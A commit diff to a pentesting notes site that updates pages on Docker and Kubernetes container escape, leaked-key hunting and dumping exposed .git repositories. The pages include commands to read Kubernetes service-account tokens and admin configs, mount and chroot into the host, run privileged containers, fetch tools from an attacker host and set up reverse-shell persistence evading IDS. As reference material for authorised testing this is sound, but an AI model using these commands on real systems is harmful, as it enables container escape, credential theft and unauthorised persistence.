edit Active Directory pages

Author: hdks-bug

src/exploit/container/docker/docker-escape.md

@@ -7,7 +7,7 @@ tags:
 refs:
     - https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
     - https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
-date: 2024-12-24
+date: 2025-03-17
 draft: false
 ---
 
@@ -80,6 +80,15 @@ find / -name "docker" 2>/dev/null
 
 # Container capabilities
 capsh --print
+
+# Enumerate pods
+crictl pods
+
+# Investigate Docker socket for containerd
+# crictl can be downloaded from https://github.com/kubernetes-sigs/cri-tools
+crictl -r unix:///run/containerd/containerd.sock ps
+crictl -r unix:///run/containerd/containerd.sock images
+crictl -r unix:///run/containerd/containerd.sock container ls
 ```
 
 ### Access Another Host
@@ -98,8 +107,6 @@ wget http://<local-ip>:8000/socat
 curl <local-ip>:8000/scp -o socat
 ```
 
-<br />
-
 ## SSH Login
 
 We might be able to login SSH on the target host if we know the credentials.
@@ -108,8 +115,6 @@ We might be able to login SSH on the target host if we know the credentials.
 ssh user@127.0.0.1
 ```
 
-<br />
-
 ## Mounting
 
 Check disks or mounted folders and we might be able to see the directories of the host system.  
@@ -134,14 +139,18 @@ mount /dev/xvda1 /mnt/tmp
 
 Now we can observe inside the `/mnt/tmp` directory.
 
-<br />
+## Gain Access to Mounted System
+
+After mounting or found mounted folder, we can change root to the mounted folder:
+
+```bash
+chroot /mounted_folder bash
+```
 
 ## Privilege Escalation to Root
 
 Please see [Linux Privilege Escalation](/exploit/linux/privilege-escalation/).
 
-<br />
-
 ## Run Vulnerable Docker Image
 
 According to [Hacktricks](https://book.hacktricks.xyz/network-services-pentesting/2375-pentesting-docker#compromising), we can escape a docker container with the vulnerable image.  
@@ -152,8 +161,6 @@ docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
 cd /mnt/
 ```
 
-<br />
-
 ## Download Interesting Files
 
 ```bash
@@ -174,8 +181,6 @@ sudo systemctl start ssh
 scp ./example.txt <username>@<local-ip>:/home/<username>/example.txt
 ```
 
-<br />
-
 ## Run Existing Docker Image
 
 ### 1. Check if current user belongs to "docker" group
@@ -214,14 +219,10 @@ docker run -it --entrypoint=/bin/bash -v /:/mnt/ example:master
 
 After that, you can investigate sensitive information in the **`/mnt/`** folders.
 
-<br />
-
 ## Docker Socket Escape
 
 Reference: [https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25](https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25)
 
-<br />
-
 ## Establish Persistence After PrivEsc
 
 After that you invaded the docker container, you might be able to make it persistence while evading the IDS alerts by creating a docker compose file and abusing the entrypoint option to grant you a reverse shell.
@@ -257,8 +258,6 @@ Now run the docker compose in remote machine. You should gain a shell.
 docker-compose run
 ```
 
-<br />
-
 ## Amazon Elastic Container Registry (ECR) Public Gallery
 
 ### 1. Run the Docker Container
@@ -312,6 +311,3 @@ printenv
     # Get sensitive information
     grep -e 'token' -e 'secret' */*
     ```
-
-<br />
-

src/exploit/container/docker/index.md

@@ -5,7 +5,7 @@ tags:
     - Container
     - Privilege Escalation
 refs:
-date: 2023-10-11
+date: 2025-03-17
 draft: false
 ---
 
@@ -22,6 +22,9 @@ find / -name "docker" 2>/dev/null
 ### Basic Commands
 
 ```sh
+# Get comprehensive information
+docker info
+
 # List images
 docker images
 docker image ls

src/exploit/container/kubernetes/index.md

@@ -2,9 +2,10 @@
 title: Kubernetes Pentesting
 description: A portable, extensible, open source platform for managing containerized workloads and services, that facilitates both declarative configuration and automation. Default ports are 6443, 8443.
 tags:
-    - Container
+  - Container
 refs:
-date: 2024-12-24
+  - https://madhuakula.com/kubernetes-goat/docs/kubernetes-goat-cheat-sheet/
+date: 2025-03-17
 draft: false
 ---
 
@@ -32,11 +33,15 @@ wget http://<local-ip>:8000/kubectl -O /tmp/kubectl
 chmod +x /tmp/kubectl
 ```
 
-<br />
-
 ## Investigation From Inside
 
+If we’re in the target system, investigate cluster, nodes, pods with the following commands:
+
 ```sh
+# Check configurations
+cat /etc/kubernetes/admin.conf
+cat /etc/kubernetes/kubelet.conf
+
 # JWT token
 cat /var/run/secrets/kubernetes.io/serviceaccount/token
 # if we find the token, decode it in https://jwt.io/
@@ -52,15 +57,34 @@ kubectl auth can-i --list
 # /var/run/secrets/kubernetes.io/serviceaccount/token
 kubectl auth can-i --list --token=<JWT>
 
+# Get namespaces
+kubectl get namespaces
+
 # Roles
 kubectl get rolebindings -n <namespace>
 kubectl describe <bind_name> -n <namespace>
 kubectl describe role <role_name> -n <namespace>
 
-# Pods
+## Cluster
+# Start/stop cluster
+minikube start
+minikube stop
+# Get status for cluster
+minikube status
+# Get cluster information
+kubectl cluster-info
+
+## Nodes
+kubectl get nodes
+
+## Pods
 kubectl get pods
 # -A: List all pods across all namespaces
 kubectl get pods -A
+# Get pods from specific namespace
+kubectl get pods -n <namespace>
+# Get detailed information for pods
+kubectl get pods -o wide
 # Get the detail information abou the pod
 # -o: Output format
 kubectl get pod <pod-name> -o yaml
@@ -74,6 +98,13 @@ kubectl describe clusterrole <role-name>
 # ClusterRoleBinding information
 kubectl describe clustrrolebinding <role-name>
 
+# Get inside a target pod
+kubectl exec -it <pod> -- sh
+
+# Get logs of the pod/container
+kubectl logs <pod>
+kubectl logs-f <pod>
+
 # Services
 kubectl get svc
 
@@ -105,8 +136,6 @@ kubectl create serviceaccount api-explorer
 kubectl create rolebinding api-explorer:log-reader --clusterrole log-reader --serviceaccount default:api-explorer 
 ```
 
-<br />
-
 ## Investigation via Kubernetes API Server
 
 If we get the JWT, we can fetch information by the following commans.
@@ -117,8 +146,6 @@ curl -k -v -H "Authorization: Bearer <jwt-token>" https://<target-ip>:<target-po
 curl -k -v -H "Authorization: Bearer <jwt-token>" https://<target-ip>:<target-port>/api/v1/namespaces/default/secrets/
 ```
 
-<br />
-
 ## Privilege Escalation (Escape) using the Container Image
 
 ### 1. Get Information About the Target Pod
@@ -167,8 +194,6 @@ kubectl run testbox --restart Never -it --rm --image newimage --overrides '{"spe
 
 Now we should escape the container and get a target shell.
 
-<br />
-
 ## Privilege Escalation using Bad Pods
 
 Reference: [everything-allowed-exec-pod.yaml](https://github.com/BishopFox/badPods/blob/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml)

src/exploit/reconnaissance/find-leaked-api-keys.md

@@ -4,7 +4,7 @@ description: Finding API keys which are leaked is crucial work for penetration t
 tags:
     - Reconnaissance
 refs:
-date: 2023-08-24
+date: 2025-03-17
 draft: false
 ---
 
@@ -14,7 +14,13 @@ draft: false
 
     This repository lists quick ways to find API keys of various providers.
 
-<br />
+## Using Trufflehog
+
+[Trufflehog](https://github.com/trufflesecurity/trufflehog) is a CLI tool to find, verify, and analyze leaked credentials.
+
+```bash
+trufflehog git https://github.com/<username>/<repo> --results=verified,unknown
+```
 
 ## Google Dorks
 

src/exploit/version-control/git/git-github-pentesting.md

@@ -5,7 +5,7 @@ tags:
     - Git
     - Reconnaissance
 refs:
-date: 2023-02-25
+date: 2023-03-17
 draft: false
 ---
 
@@ -41,7 +41,7 @@ git status
 ### Back to the Previous Commits
 
 ```sh
-# You can get the "commit-id" by 'git log'
+# We can get the "commit-id" by 'git log'
 git checkout <commit-id>
 git --git-dir /path/to/.git checkout <commit-id>
 
@@ -99,8 +99,6 @@ Then restore them.
 git restore <a-deleted-file>
 ```
 
-<br />
-
 ## GitHub Dorks
 
 ### Search Target Repository
@@ -133,5 +131,3 @@ For more details, see the [github-dorks](https://github.com/techgaun/github-dork
     ```
 
 4. Check the “From” section in the page. You should find the email address of the commiter.
-
-<br />

src/exploit/web/dump-git-repository-from-website.md

@@ -4,11 +4,13 @@ description: If we can have permission to access git repositoy in target website
 tags:
     - Web
 refs:
-date: 2025-02-27
+date: 2025-03-17
 draft: false
 ---
 
-## Dumping with Git-Dumper
+## Dumping
+
+### Method 1. Git-Dumper
 
 [git-dumper](https://github.com/arthaud/git-dumper) is an useful Python package.
 
@@ -17,24 +19,7 @@ pipx install git-dumper
 git-dumper https://example.com/.git ./dumped
 ```
 
-<br />
-
-## Dumping with Wget
-
-We can simply use **`wget`** command in Linux to download the git repository.  
-After that, we can investigate files or all histories.
-
-```bash
-# -r: Recursive
-wget -r https://example.com/.git/
-cd example.com
-git log --stat
-git checkout <commit_id>
-```
-
-<br />
-
-## Dumping with gitdumper and extracter
+### Method 2. GitTools
 
 [GitTools](https://github.com/internetwache/GitTools) downloads Git repository of the web application.  
 To dump the repository, execute the following commands.
@@ -56,3 +41,7 @@ chmod +x extractor.sh
 
 Now we retrieve the entire git project from website.  
 It is stored in **“./new_example”** folder. We can investigate the repository.
+
+## After Dumping…
+
+If we succeed in dumping, we can investigate the repository with `git` command and get sensitive information. See [Git GitHub Pentesting](https://exploit-notes.hdks.org/exploit/version-control/git/git-github-pentesting/).